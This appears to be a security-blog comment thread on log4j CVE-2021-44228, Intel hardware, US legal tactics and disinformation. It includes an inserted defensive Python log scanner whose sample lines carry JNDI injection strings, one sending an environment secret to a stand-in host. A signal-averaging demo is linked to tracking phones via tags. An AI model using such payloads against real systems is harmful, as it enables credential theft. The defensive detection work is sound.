“You can lead a horse to water…”

But there is a downside, some prefer to live in ignorance so “shoot the messenger” and have in some cases accused me of “telling the bad guys how to do things”…

Let me put it this way, there is a spectrum of “bad guys” who get “caught out” or you get to see ranging from illegal/immoral to sometimes ethical,

1, The “idiots” you eventually see caught and prosecuted.
2, The “money boys” you see caught out but not prosecuted.
3, The “Guard Labour” you rarely see caught out and are usually legally protected.
4, The “thoughtful” you never see caught out because they carefully don’t get their hands dirty.

Then there are those that are not “bad guys” but many make the mistake of thinking they are,

5, The “researcher” who responsibly isolates their tests, then warns people of the dangers they have found

To many they never see beyond the first type of “bad guy” so fail to see why warning people of “capabilities” is important.

Nor do they understand about the fact “electronic communications is no longer ephemeral” thus their past is waiting to potentially haunt them in later life.

So in some respects, these days, when you see a warning it’s already “too late”… But you only find that out years later.

What @ResearcherZero has done is shown you and others what the level 3 and 4 bad guys have been doing that is sufficiently unethical or immoral that people “whistleblow” on them…

Peter A. December 13, 2021 4:56 AM

@someone: re: text browser and image support

lynx/links/w3m + cacaview is one way to go. All nicely packaged in popular Linux distributions, including source tarballs if you care. Some terminal emulator with color xterm support is handy – just select a really small font size and maximize the window, you get a few hundred by a few hundred “pixels” resolution, actually a little more by the virtue of font shape aliasing. If you roll back your chair a few meters from the monitor – looks like a real photo.

name.withheld.for.obvious.reasons December 13, 2021 6:38 AM

@ Clive, SpaceLifeForm, Winter, ResearcherZero, SumpremeL

Thank you Clive for stating the least obvious, seems there is a proclivity to redact to a degree that is a cause of some angst (in my case, more than some). It is so difficult to lift the lid/skirt/covers/seal/veil on this subject area that this comment has loads of seats (from being couched).

There is currently a continuum of activity and action across many channels and spheres of influence that cause concern and suggest that timelines in the neighborhood of months are something of a window. Two parallel tracks, one headlong to the endpoint and the other in discovery. I am afraid the discovery track is sufficiently behind that we might all be considerate of our own OPSEC. Making lists is not just for LEA’s and Santa Claus as we know. Some people just cannot help but want all the marbles, even if they have more than they need.

As discernible from the above diatribe, this is where we find ourselves today. Use this as a relativistic marker if you will.

JonKnowsNothing December 13, 2021 8:26 AM

@All

re: A new potential US Legal Process that can be used against MostAnyCo

Background

The USA has 2 main sets of legal systems: Federal which are national laws and State which are laws affecting those inside that state only. There are occasions when State and Federal laws clash. In normal course of legal proceedings Federal laws override State laws. There are currently several high profile cases at the Supreme Court (SCOTUS) about such clashes.

What is important to know is that one of the new techniques used by a US State to void a US Federal law has other implications. If SCOTUS does not prohibit this technique it can be used against nearly any corporation, including technology companies.

Method

AState passes ALaw declaring SomeStuff to be illegal in AState.

Under normal laws, enforcement of ALaw would fall to the LEOs of AState.

In this new legal process there is zero enforcement of ALaw by LEOs. It is a law without criminal enforcement.

The enforcement clause is passed to civilians to bring civil charges against SomeStuff providers, manufacturers, retailers, suppliers. It sets the claim amount to the same ceiling of $10,000 used by US Small Claims Courts.

There are no limits to the number of suits, nor the number of re-files, nor the number of claimants.

Normally a person needs to have had some loss(es) to be recovered by a claim. In this situation no personal direct damage thresholds are needed.

To Consider

If this process is permitted to stand by SCOTUS, many laws could be subject to such a redirection of enforcement. Many Tech Companies are shielded from lawsuits by various laws, FB$$, G$$, M$$ and many other types of corporations. Oil and Gas companies, Finance companies nearly any company or individuals can be the recipient of continuous claims of $10,000 each.

As the heat over some of these difficult questions continues and courts render opinions and findings that are unpopular with a portion of the population, this process cuts both ways:

Both

  • to restrict previously protected actions

    and

  • to expand previously prohibited restrictions.

ex:

A Federal court struck down a California ban on certain types of automated firing systems that had been in place for many years.

California plans to use the same technique used by the State of Texas to restrict women’s health choices.

The Texas law allows civilian claims against providers, supporters, suppliers and financing groups, that provide women’s health choices.

The California law would target manufacturers, supporters, suppliers and financing groups that make some automated firing systems. Until now all of these groups have been protected by various Federal Laws. (1)

If this becomes common practice, it will take only a State law to subject technology companies, manufacturers and software providers to continuing claims. $10,000 USD isn’t much but it can be claimed many times, by anyone, in any State.

The USA has an estimated population of 333,791,863.

If every one of those people files a $10,000 claim against the 10 biggest Tech Companies, yielding $100,000 for each set of claims, that might be a new method of social funding.

  333,791,863 * 100,000 = $33,379,186,300,000

===

1) There are nuances to how the California version would stand in courts. Not all automated firing systems are protected by direct Federal law.

h ttp s://www.me rcuryne ws. com/2021/12/12/legal-experts-respond-to-newsom-modeling-assault-weapon-law-on-texas-abortion-bill/

JonKnowsNothing December 13, 2021 2:52 PM

@All

re: Follow the White Rabbit to $10KClaims

A hypothetical application of civil $10Kclaims enforcement when applied to tech firms

Consider

  • There are existing definitions of harmful explicit content
  • Corporations employ many people to screen out such content
  • LEAs also employ many people to screen such content

If a new civil $10KClaim enforcement law is passed for explicit content, any and all such content, the provider, supply chain, and destination becomes a source of $10KClaim law suits

The difference between the existing system and the new system is in enforcement.

  • Currently harmful explicit content must reach a particular threshold to qualify for criminal proceedings
  • Under the new system there is no requirement threshold to qualify for the $10KClaim

Any person in any US State may bring such a suit. There is no requirement for direct harm needed.

  • Currently, a person must prove direct harm to bring a lawsuit, this is often referred to as “Standing”. If there is No Harm there is No Penalty.
  • Under the new $10KClaims there is no requirement for direct harm.

There have been a number of lawsuits brought by persons whose jobs require them to view images and videos depicting the worst depravity that can be inflicted by humanity. They have to view thousands of these images every day for hours on end. All social media companies have phalanxes of people sorting through the legal vs not-legal images. LEOs also go through the same images.

These “explicit content moderators” have brought suits for mental and physical health harms from watching such content. Some have been successful and some have not been successful. Often the failure is not over the impacts on the persons health status, but over a definition of whether the person is an employee or contractor or sub-sub-sub-contractor.

Under the $10KClaim laws it would not matter if the filer was an employee, contractor, sub-sub-sub contractor, or had directly viewed any images or some n-number of images or was even in the same State where the company was located or where the images were viewed.

The entire supply chain makers from Camera to PC to Internet Routing to Media Company could be liable for $10KClaims for every instance that violated the civil enforcement law.

In the USA Small Claims Courts do not allow directed legal representation. The individuals represent themselves. A Media Corporation would not normally be able to send down their Big Legal Teams to represent them in these courts.

Consider More

The same process can be applied to Gig Economy Workers by defining some aspect such as Tip-Clawbacks to be illegal with civil enforcement.

It could be applied to Personal Data Protections where “malware, telemetry or software that extracts, adds, calculates or identifies a user” is illegal. Opt-Out Opt-In would be irrelevant to the $10KClaim.

There are @26 US States with “Copy-Cat Texas” laws ready to implement immediately upon SCOTUS approval of the technique. The official SCOTUS response is expected June 2022.

someone December 13, 2021 3:49 PM

@Clive re: crap in newsfeeds – I found your post a bit terse, so I’m uncertain we are addressing the same point (time-constrained, so I skipped a number of intervening posts). Anyway, with JS off, clicking on a link in Google News will open a new page showing the actual link to the article at the host site, without the crap. I’m assuming that part of the crap is code that gets Google its micropayment for the link (my objective was to try to stiff them on that). I copy the displayed host link, call up my home page (which resides on my local drive and is plain text), and then navigate from my home page to the host link. Does this keep Google from getting credit? I have no way to ascertain that, and I can easily think of a dozen alternative ways they could be credited, but I’m hopeful my browsing pattern at least doesn’t fit their assumptions.

SpaceLifeForm December 13, 2021 5:44 PM

@ lurker, Ted, Clive, ALL

log4j CVE-2021-44228

I saw this coming from a country mile.

Repeating:

That it can leak server-side environment variables to the attacker controlled DNS server (because the DNS traffic is most certainly cleartext), is, well, not good.

The problem is that the logging software does not log itself, and when it leaks, that the leak occurred, is itself, not logged.

Logging software should only write to disk or to internal servers.

https://www.twitter.com/kennwhite/status/1470438229539233796

,but also now seeing telemetry from several sources that looks to be critical API keys/secrets leaks. Basically, a one-punch silent unlogged theft of critical instance credentials. That is Not Good.
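A defender-side illustration of the point above, added here as an example and not code from SpaceLifeForm’s comment or from the Log4j project: a small scanner that walks constructed front-end access log lines and flags the `${type:...}` lookup syntax that CVE-2021-44228 abuses, reporting which lookup types appear and whether a JNDI lookup carries a nested `${env:...}` or `${sys:...}` reference, which is the environment-variable exfiltration path the comment describes. Since the application’s own log may record only the resolved result (the leak is not itself logged), the raw request line as seen by a proxy or web server is where the attempt is usually still visible. The sample lines, the `.invalid` hostnames and the function names are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List

# Log4j 2 lookup syntax is ${type:argument}; lookups may nest, and the inner
# one is resolved first. That is how a JNDI target such as
# "dns://${env:SECRET}.host" ends up carrying the value of SECRET in a DNS query.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z]+):")

# Lookup types whose value is sensitive when pulled into a JNDI target.
SECRET_SOURCES = {"env", "sys"}

# Constructed access-log lines (not real traffic) for the demonstration.
SAMPLE_LOG = [
    '2021-12-10T03:14:07Z INFO  GET /index.html ua="Mozilla/5.0"',
    '2021-12-10T03:14:08Z INFO  GET /status msg=${date:yyyy-MM-dd}',
    '2021-12-10T03:14:09Z INFO  GET / ua="${jndi:ldap://lookup.example.invalid/a}"',
    '2021-12-10T03:14:11Z INFO  GET / x-api-version="${jndi:dns://${env:DB_PASSWORD}.lookup.example.invalid}"',
]


@dataclass
class Finding:
    line_no: int
    lookup_types: List[str]   # every lookup type seen, in order of appearance
    jndi_targets: List[str]   # text inside each ${jndi:...}
    exfil_risk: bool          # some JNDI target nests an env/sys lookup


def lookup_types(line: str) -> List[str]:
    """All ${type: prefixes present in the line, lowercased."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(line)]


def jndi_targets(line: str) -> List[str]:
    """Text inside each ${jndi:...}, matching braces so nested lookups are kept whole."""
    targets = []
    lower = line.lower()
    start = lower.find("${jndi:")
    while start != -1:
        depth, end, i = 0, None, start
        while i < len(line):
            if line.startswith("${", i):
                depth += 1
                i += 2
                continue
            if line[i] == "}":
                depth -= 1
                if depth == 0:
                    end = i
                    break
            i += 1
        body_start = start + len("${jndi:")
        # An unterminated lookup is still reported: keep everything to end of line.
        targets.append(line[body_start:end] if end is not None else line[body_start:])
        if end is None:
            break
        start = lower.find("${jndi:", end)
    return targets


def scan_log(lines) -> List[Finding]:
    """Return one Finding per line that contains any lookup syntax."""
    findings = []
    for n, line in enumerate(lines, 1):
        types = lookup_types(line)
        if not types:
            continue
        targets = jndi_targets(line)
        risk = any(t in SECRET_SOURCES for tgt in targets for t in lookup_types(tgt))
        findings.append(Finding(n, types, targets, risk))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "EXFIL-RISK" if f.exfil_risk else ("JNDI" if f.jndi_targets else "lookup")
        print(f"line {f.line_no}: {flag:10s} types={f.lookup_types} jndi={f.jndi_targets}")
```

The scanner matches only the literal lookup syntax, so it is triage for log review, not a control: lines flagged EXFIL-RISK name the variable that would have left the host, which is what to rotate first. The fix for the vulnerability itself remains upgrading Log4j past the affected versions.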

Clive Robinson December 13, 2021 8:15 PM

@ SpaceLifeForm, ALL,

With regards,

“Basically, a one-punch silent unlogged theft of critical instance credentials.”

“Wham, bam, thank you for the root of trust”

Have you noticed in real life things are very very rarely “Black or White” there is a spectrum of “grey”?

As humans we over trust by nature but we very rarely “fully trust”. Yet our systems are secure or insecure, trusted or not trusted…

It begs the question “Can we have ‘shades of grey’ in security?”

Some years ago now I did work on what I called “Probabilistic security” where you could in effect set a threshold. I did not take it as far as it could have gone. I’m thinking it’s time for people to take it further, if for no other reason than to minimise the impact of the loss of the root of trust.

Clive Robinson December 13, 2021 9:25 PM

@ SpaceLifeForm,

For some reason the “2” in “12” went missing in your link…

https://www.theregister.com/2021/12/13/chipzillas_mystery_linux_muckabout_is/

But…

What is Intel up to?

I noted the possibility of FPGA added to CPUs the other day.

The Register opinion piece gives an apparently different view based on the old “Big Iron” tricks that can still be found in IBM Z servers and, if you have them, decade-old Sun boxes.

The simple fact is that all the Register article says applies even more so to “hardware algorithms”.

But there is a third thing to consider, which is “Backdoors”.

We know Intel’s hardware is riddled with bugs, and that they ship “microcode patches” to actually get your CPU up and approximating stable.

We also know there is a lot that goes on in the famed “Ring -3” with hidden *nix “overlord” hardware, that the US Gov does get access to, at the very least, to “turn off” functionality.

It would be no great surprise to me if Intel started putting more “Silicon Bugs” in their chips to create “side channels” to “leak information”.

The ability to turn them on and off would be quite desirable to a number of people…

As I said a few days back there is more than one side channel domain,

1, Amplitude domain
2, Time domain

Are the two primary ones that give us both,

3, Frequency domain
4, Sequency domain

Both of which work in constant time in some manner.

But what if time is not constant?

Well the sequency domain becomes a new domain,

5, Event domain.

But what does that mean?

Imagine a line that represents a spectrum from fully deterministic to fully random at the other with chaotic covering the middle.

It’s also a spectrum of complexity with low complexity to high complexity.

Obviously the amplitude domain falls at the low complexity end with the time domain a little further up. The event domain appears more towards the high complexity end.

So finding side channels based on these domains gets increasingly harder for an “observer” and at some point crosses a threshold where in effect you can not tell the difference between complexity carrying information out as a side channel from random noise.

SpaceLifeForm December 13, 2021 9:57 PM

@ Clive

Decoding BaaS in Silicon Turtles

Not sure why the “2” dropped, as it was a plain C+P, but maybe I accidentally deleted it before the cut. Maybe.

Anyway, I knew you would not be stumped very long.

You connected the dots, and figured out what the “B” means.

The real question is, why would it be ‘as a Service’?

As in, service to whom?

Just the highest bidder?

ResearcherZero December 13, 2021 11:16 PM

@Clive Robinson

“the root of trust” is very important, and I would argue it increasingly applies even to what people believe, not just authentication.

It is why hybrid warfare is a fool’s gambit.

Nils Melzer, UN Special Rapporteur on Torture:

“I know, you may think I am deluded. How could life in an Embassy with a cat and a skateboard ever amount to torture? That’s exactly what I thought, too, when Assange first appealed to my office for protection. Like most of the public, I had been subconsciously poisoned by the relentless smear campaign, which had been disseminated over the years. So it took a second knock on my door to get my reluctant attention. But once I looked into the facts of this case, what I found filled me with repulsion and disbelief.”

“In the end it finally dawned on me that I had been blinded by propaganda, and that Assange had been systematically slandered to divert attention from the crimes he exposed. Once he had been dehumanized through isolation, ridicule and shame, just like the witches we used to burn at the stake, it was easy to deprive him of his most fundamental rights without provoking public outrage worldwide. And thus, a legal precedent is being set, through the backdoor of our own complacency, which in the future can and will be applied just as well to disclosures by The Guardian, the New York Times and ABC News.”
https://medium.com/@njmelzer/demasking-the-torture-of-julian-assange-b252ffdcb768

“House arrest would be absolutely possible. They did it with Augusto Pinochet. The former dictator of Chile was in extradition detention in London for 18 months. But he was not put in a high-security prison, but accommodated in a villa under house arrest. He was even visited by the former prime minister [Margaret] Thatcher, who brought him whisky. He had a very privileged existence.”

“It is important to understand that, in extradition detention, you are not to be treated as a criminal. You are just detained so you cannot escape in case you will end up being extradited. That Julian Assange is being put in a high security prison with extremely severe restrictions on his private and professional life and procedural rights is completely disproportionate.”

“It’s unnecessary, there is no legal basis to do that. The intent is clearly to intimidate other journalists, to silence him so he cannot do his journalistic work, which he clearly is entitled to exercise freely.”
https://www.dw.com/en/un-rapporteur-on-assange-the-us-is-trying-to-criminalize-investigative-journalism/a-56076248

So if you are a dictator and you torture, execute and disappear people, you get whiskey.

If you instead publish the painful truth, you don’t get any whiskey, you are sent to a maximum security prison, and you are not even afforded the legal defense preparations that are given to even the very worst of criminals.

States are dissolving “The Root of Trust”, this is in turn acting as a destabilizing force. They are destabilizing with spy tools and surveillance, they are destabilizing with political persecutions, and they are destabilizing with conspiracy theories which are amplified by their own political ‘fixers’.

If this isn’t bad enough, studies have shown exposure to automation led to an increase in support for radical-right parties in Western European countries between the late 1990s and 2016.
https://www.knowledge.unibocconi.eu/notizia.php?idArt=23580

“individual exposure to the automation shock leads to poorer perceived economic conditions, lower likelihood of having a permanent contract, and lower satisfaction with the government and democracy.”
https://doi.org/10.1073/pnas.2111611118

And there are a lot of additional costs that come with our fancy little gadgets, and that is even before considering the loss of privacy and growing authoritarianism.

RABBIT HOLE WARNING

60% of China’s ground water is rated unfit for human consumption, and the industry that supplies chemicals to the electronics industry is a $20B a year industry, which is quite an incentive for “business as usual”.

“The fact that women around the world were still being subjected to things that experts, including corporate leaders, decided should not be used in the workplace—to me that is an extremely sad story, and a loss for public health.”
https://www.bloomberg.com/news/features/2017-06-15/american-chipmakers-had-a-toxic-problem-so-they-outsourced-it

In a 1911 lecture to the Eugenics Education Society in London, Sir Thomas Oliver, a physician, spoke of his hard-won success “in securing the emancipation of female labour from the dangerous processes of lead-making. …Lead hits hard the reproductive powers of man and woman, but especially of woman.”
https://www.slate.com/articles/business/moneybox/2015/07/toxic_substances_in_electronics_manufacturing_the_u_s_does_tragically_little.html

“What began a year ago as a drive, according to the chemical conglomerate’s spokesmen, to shift its female employees out of positions at the company’s plant here where exposure to lead could harm their unborn children has backfired into charges by five of the women that they had to have themselves surgically sterilized to keep their jobs.”
https://www.washingtonpost.com/archive/politics/1979/01/01/women-say-they-had-to-be-sterilized-to-hold-jobs/74f7104e-8449-48d2-9592-c52d496dfffc/

“Families and a labour welfare group believe the leukaemia was caused by exposure to chemicals used to clean electrical panels and say many more workers could have been affected. They add that young workers who fall sick with leukaemia are dismissed and denied continuing medical coverage, bankrupting families as they desperately pay for treatment.”
https://www.dailymail.co.uk/news/article-2754824/Mystery-cancer-cluster-killing-Chinese-workers-factory-makes-new-iPhone-6-At-13-staff-diagnosed-leukaemia-falling-sick-plant-recent-years.html

That is a big reason why people in China have riots and protests, because the rivers and ground water are increasingly becoming a toxic soup, and the health effects are making people desperate and angry.
Then the Chinese Government in turn increases surveillance, authoritarian behavior, and creates a subjugated workforce to build the surveillance apparatus.

This in turn creates more pollution and growing resentment, so it creates a social credit scheme, and hopes that descending into the fantasies of a Brave New World can subdue the problem. Meanwhile Steve Bannon is thinking to himself, “Hell, why not have our own Cultural Revolution?”

ResearcherZero December 13, 2021 11:43 PM

Plato said it more simply around 2,400 years ago, in the 5th century BCE, “We can easily forgive a child who is afraid of the dark; the real tragedy of life is when men are afraid of the light.”

SpaceLifeForm December 14, 2021 12:40 AM

log4j CVE-2021-44228

Newer bad news

Apparently, -Dlog4j2.formatMsgNoLookups=true does not always work.

The version of the Java (JRE) apparently does not matter other than getting on the treadmill (because log4j 2.15 requires Java 8).

The 2.15.0-rc1 version of log4j was a bad fix and has already been worked around, so now there is a 2.15.0-rc2 version that supposedly (wink, wink) stops any exploit.

SpaceLifeForm December 14, 2021 1:12 AM

@ Clive

a phone emulator running inside a container on an isolated windows box

Best Oxymoron I’ve read in some time.

Winter December 14, 2021 1:48 AM

@Clive, All
“What is Intel upto?”

Making money and protecting market dominance?

I find the reasoning by The Register entirely plausible. Modern chips run the old instruction sets in an emulator. Price segmentation is a well-established way for monopolies and oligopolies to fleece customers. Crippling products is widely used to do that. Crippling products increases cost, and DRM is a relatively low-cost way of crippling a product.

Intel has been doing this for a long time, so why not now?

ResearcherZero December 14, 2021 3:19 AM

There is currently still not enough incentive to secure organizations and institutions. There is so much money pumping through some of these institutions, and some of them don’t care where the money is coming from. There is also the problem of social media, which is also fueled by advertising and data monetization, and a profit model of engagement, which also has not cared much about where the money is coming from.

It’s not just a problem of political manipulation, there is also a bizarre experiment in altering human psychology taking place.

Social media is providing both a dopamine reward response from positive feedback, and negative feedback is generating a ‘flight or fight’ response. The negative feedback is leading to real life negative consequences, real life anger, sometimes provoking incidents which lead to violence.

“…when it comes to massive social platforms like Facebook, Instagram, or YouTube, the root of many problems is the use of ranking algorithms designed to maximize engagement. A system optimized for engagement rather than quality is one that supercharges the reach of plagiarists, trolls, and misleading, hyper-partisan outrage bait.”
https://www.wired.com/story/congress-takes-aim-at-algorithms-section-230-reform/

Social media companies are “behavior modification empires,” perfecting the techniques behaviorist psychologists pioneered decades ago.
https://thinkr.org/newsletter/ten-arguments-for-deleting-your-social-media-accounts-right-now

Building a disinformation network:

The GRU created think tanks and media outlets to serve as initial content drops, and fabricated personas — fake online identities — to serve as authors.
https://cyber.fsi.stanford.edu/io/news/potemkin-pages-personas-blog

Through the process of mapping the GRU-attributed author and distributor networks, we observe numerous suspicious and false personas who appear to contribute regularly to a network of “independent media” and “alternative news” publications.
https://fsi-live.s3.us-west-1.amazonaws.com/s3fs-public/potemkin-pages-personas-sio-wp.pdf

High-value and long-running personas cultivated influence within US political discourse. These accounts were retweeted by political figures, and quoted by media outlets.
https://fivethirtyeight.com/features/what-you-found-in-3-million-russian-troll-tweets/

Putin’s order took the formerly state-run RIA Novosti news agency, and the Voice of Russia radio station, and transferred them to the new agency, whose name means “Russia Today.”
https://medium.com/dfrlab/putinatwar-how-sputnik-secures-russias-interests-61a8f2fcf8ec

President Vladimir Putin shut down RIA Novosti, which was respected for its news coverage, earlier this month (December 2013).
https://www.bbc.com/news/world-europe-25560434

Russian propaganda is produced in incredibly large volumes and is broadcast or otherwise distributed via a large number of channels.
https://www.rand.org/pubs/perspectives/PE198.html

Gerard van Vooren December 14, 2021 4:16 AM

@ Winter,

I find the reasoning by The Register entirely plausible. Modern chips run the old instruction sets in an emulator. Price segmentation is a well-established way for monopolies and oligopolies to fleece customers. Crippling products is widely used to do that. Crippling products increases cost, and DRM is a relatively low-cost way of crippling a product.

That is probably the reason why Apple went to ARM for their newest generation of hardware. And I am sure that others will soon follow because ARM is “the better product” AFAIK. But of course there is always the problem of software compatibility. Maybe it is time to get rid of MS and Intel.

Winter December 14, 2021 4:28 AM

@Gerard van Vooren
“But of course there is always the problem of software compatibility. Maybe it is time to get rid of MS and Intel.”

The software, and data, are worth more than the hardware. So I am afraid that will not happen. The i86 instruction set will outlive the Desktop PC & Laptop by a margin. See Cobol, which lives on way beyond the usefulness of the original hardware.

Clive Robinson December 14, 2021 6:33 AM

@ SpaceLifeForm,

Just the highest bidder?

More like,

“Highest up the Hierarchy”…

As for the oxymoron, yes it would look like one, but that is the way things are set up in that test lab…

Apparently it’s the old problem of OSS is not “sufficiently trusted” by some “managers”…

Clive Robinson December 14, 2021 6:56 AM

@ SpaceLifeForm, ALL,

Re Apple tags and,

The last paragraph is an eye-roll.

Apple do not appear to have worked out that anyone half smart can use multiple tags in rotation or some random pattern…

But it’s more subtle you can “track a phone” when you know where the tags are.

Let me put it this way, even though Apple use encryption and supposedly hide the ID of the iPhone that picks the tag up,

“The Signal is the message”

And all you have to do is,

“Lift the signal above the noise”

Which is basically what some of the more interesting bits of “Traffic Analysis” are all about.

I won’t go into the fun details but note what any basic book on “Signals Detection” will tell you,

1, If the noise approximates to AWGN then it is effectively random.

2, The signal is not random but is not initially synchronized.

3, When the signal is synchronized, simple averaging will lift it above the noise floor.

The hard part would normally be getting synchronization, but when you know where the tag or beacon is, synchronisation becomes trivial via a purposeful side channel.

The rest as they say,

“Will be left as an exercise for the reader.”
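The three textbook points above, worked as a small simulation (added here as an illustration; this is not code from the comment or from Apple). It constructs captures of a weak repeating burst buried in Gaussian noise and compares averaging with and without synchronization, which is the reason an encrypted or rotating identifier does not hide the presence of a periodic emission. Frame length, burst length and amplitudes are constructed values.

```python
import math
import random
import statistics

FRAME_LEN = 64     # samples in one capture window (constructed)
BURST_LEN = 8      # the beacon burst occupies 8 of them
BURST_AT = 20      # burst position when the receiver is synchronized
AMPLITUDE = 0.2    # burst amplitude: 14 dB below the noise power
NOISE_SIGMA = 1.0  # AWGN standard deviation


def capture(rng, offset=None):
    """One noisy capture window. offset=None means noise only."""
    frame = [rng.gauss(0.0, NOISE_SIGMA) for _ in range(FRAME_LEN)]
    if offset is not None:
        for i in range(BURST_LEN):
            frame[offset + i] += AMPLITUDE  # weak burst buried in the noise
    return frame


def average(frames):
    """Sample-wise mean over all captures: a repeated signal adds
    coherently, independent noise does not."""
    n = len(frames)
    return [sum(f[i] for f in frames) / n for i in range(FRAME_LEN)]


def burst_to_noise(avg):
    """Mean level inside the expected burst window divided by the noise
    standard deviation measured outside it. Around 1 or below means the
    burst cannot be told from the noise."""
    inside = avg[BURST_AT:BURST_AT + BURST_LEN]
    outside = avg[:BURST_AT] + avg[BURST_AT + BURST_LEN:]
    return statistics.mean(inside) / statistics.pstdev(outside)


def run_demo(n_frames=400, seed=1234):
    rng = random.Random(seed)
    # Point 1: noise alone averages towards zero, its std falls as 1/sqrt(N).
    noise_std = statistics.pstdev(
        average([capture(rng) for _ in range(n_frames)]))
    # A single capture: the burst is 14 dB under the noise and invisible.
    single = burst_to_noise(capture(rng, BURST_AT))
    # Point 2: unsynchronized, the burst lands at a random position in each
    # window, so averaging smears it out and gives no gain.
    unsync = burst_to_noise(average(
        [capture(rng, rng.randint(0, FRAME_LEN - BURST_LEN))
         for _ in range(n_frames)]))
    # Point 3: synchronized, the burst sits at the same position every time,
    # so its amplitude survives averaging while the noise shrinks by sqrt(N).
    sync = burst_to_noise(
        average([capture(rng, BURST_AT) for _ in range(n_frames)]))
    return {
        "noise_only_std": noise_std,
        "expected_noise_std": NOISE_SIGMA / math.sqrt(n_frames),
        "single_frame": single,
        "unsynchronized": unsync,
        "synchronized": sync,
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name:>20}: {value:.3f}")
```

With 400 captures the synchronized burst stands several noise standard deviations above the floor, while the unsynchronized average stays near the noise level.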

Clive Robinson December 14, 2021 7:26 AM

@ Winter, ALL,

I find the reasoning by The Register entirely plausible.

As I indicated it is…

But you have to remember in ICTsec it’s now common to consider “happenstance” as “enemy action”[1]. Simply because you can not tell the difference between accident and design when it comes to vulnerabilities being created. That old saying of “never attribute malice…” is the opposite of reality these days in ICTsec. You assume malice then let others prove incompetence if that is even possible…

So my thoughts are “What is behind the curtain?” because it sure ain’t a little wizened wizard.

I know that Intel have been planning for some time to put FPGAs in high end server chips so that algorithms can become single instructions at fifty times the speed of software. But look at it logically: the aim is to sell chips that others can not, and requiring such changes to be signed off by Intel’s Private Key is not going to encourage people to develop FPGA algorithms.

That is there has to be something more than just ordinary “profit gouging”.

As I’ve indicated, in the past certain Intel customers got the keys to that “Ring -3” Management Engine, that is in effect the “Keys to the kingdom”.

Therefore as I’ve said to @SpaceLifeForm, it’s more likely to be “How high in the hierarchy” rather than “how high the price”.

I guess time will tell some, but probably not most unless someone blows a whistle to call time.

But to be honest, on a personal note, not only have I left the Micro$haft “hamster wheel of pain” and “outright spying”, I’m in the process of moving hardware as well. ARM chips in the main give more bang for your buck than Intel and at less than a quarter of the running costs.

But much of what I do or need to do can be done on “Microcontrollers” using MIPS or other cores…

So my advice is to regard Intel as rather more than hostile and “move away”. And the sooner people start, then at the very least, the less monopoly Wintel have, so the more competitive the market they will have to swim in, which should be to every consumer’s advantage to a point.

[1] From the old military saying,

Once is happenstance, twice is coincidence, thrice is enemy action.

someone December 14, 2021 6:09 PM

@Winter re: software longevity & COBOL I’m not certain your analogy holds up to close scrutiny. COBOL remains a “thing” only because of the types of applications written in it, large scale banking and military administration (initially running on IBM mainframes, then ported to emulated environments) to name two. I cut my programming teeth on COBOL. Employment opportunity realities, however, soon found me programming in RPG II and OCL on IBM minis. I challenge you to find much of anything coded in RPG II that is still in production use.

ResearcherZero December 14, 2021 10:20 PM

@Clive Robinson

Reminds me of this.

“The series of deep intrusions—called Operation Skeleton Key due to the attackers’ use of a “skeleton key injector” technique—appeared aimed at stealing as much intellectual property as possible, including source code, software development kits, and chip designs. And while CyCraft has previously given this group of hackers the name Chimera, the company’s new findings include evidence that ties them to mainland China and loosely links them to the notorious Chinese state-sponsored hacker group Winnti, also sometimes known as Barium, or Axiom.”
https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

The hackers are known to abuse Cobalt Strike, a penetration testing tool and a custom skeleton key obtained by twisting the codes of Dumpert and Mimikatz.
https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf

Clive Robinson December 15, 2021 3:04 AM

@ SpaceLifeForm,

Some comments are very sound. Many are misdirection. The ratio tells.

But “none of them groked” the BaaS aspect. Which the original author apparently did but was skating around.

But it took the commentors over there something like sixty comments to discuss what was said in what three comments here…

That’s a heck of a different “noise to signal ratio” over there…

Gerard van Vooren December 15, 2021 5:47 AM

@ Clive and others,

You know that I like to program a bit, not professionally. To be honest, I don’t like Rust, I know it is safe, but I don’t like the architecture of it. I don’t like the syntax. To me, they released too early. That problem can’t be fixed IMO. I like Go, but Go has problems too. For instance, the linking takes too long and the file sizes are massive. This problem can be solved by adding hardware but I think that the Go authors made a mistake with this as well. They should have looked at Oberon, which compiles like a rocket and the size of it is minimal. I even like their motto (of Einstein), that looks something like: “Make things as simple as possible but not any further”.

So Go also has its problems. And then I found the V language (vlang.io). V is a new PL, written by Alexander Medvednikov. It is a PL with the looks of Go, it compiles like a missile, the file size is small, comparable with C, and to be honest, I don’t know any downsides of it. It is safe too, you can link with C. It doesn’t really use a GC, and cleans up the crap that you create automatically. So, what am I not seeing here? What are the downsides of V?

Clive Robinson December 15, 2021 7:39 AM

@ ResearcherZero,

the company’s new findings include evidence that ties them to mainland China and loosely links them to the notorious Chinese state-sponsored hacker group Winnti,

Actually from what is said in the article, as usual there is no actual evidence that could not just as easily have been faked, by tools that got liberated from a US Gov agency not so long ago.

So whilst you could argue China you could also argue US, especially as they have been pushing TSMC to move their fabs to the US for some time now, which the Taiwanese Government has resisted for obvious reasons.

In some respects some US politicos think that TSMC was started with US know how, therefore it’s American tech…

The reality is back in the 1970’s when “Made in China” and “China knock-off” referred to the Island of Taiwan not Mainland China. Taiwan was making a lot of household and similar electronics with Japan being the technology leaders. Encouraging Taiwan to go into semiconductor manufacture was seen as a way to loosen the hold Japan had over the US consumer electronics industry.

It was not just Taiwan that was “encouraged” but South Korea as well.

So what has happened is that US State Dept “National Security” plan whilst initially working, almost entirely backfired…

What Taiwan did with what became “Taiwan Semiconductor Manufacturing Company”(TSMC) was in a way what “Acorn Research Machines”(ARM) did in the 1980’s.

ARM designed chips but did not manufacture, it licensed the design. What TSMC did was not design and make their own chips, but manufacture chips for other people.

Both ARM and TSMC’s choices turned them into world leaders with the result both companies really should be seen as “National Security” assets for their respective countries.

Unfortunately ARM got sold off to “SoftBank” and there are allegations still floating around that this was with Chinese Money. However the US is trying to get its hands on ARM one way or another, how that plays out might cause a “fire sale” that breaks ARM up and destroys it.

I suspect TSMC being the world’s largest producer of ARM designs, is rather aware of the “Power Plays” going on behind the scenes. Which is maybe why they are so far only really talking about setting up a $14billion plant in Arizona.

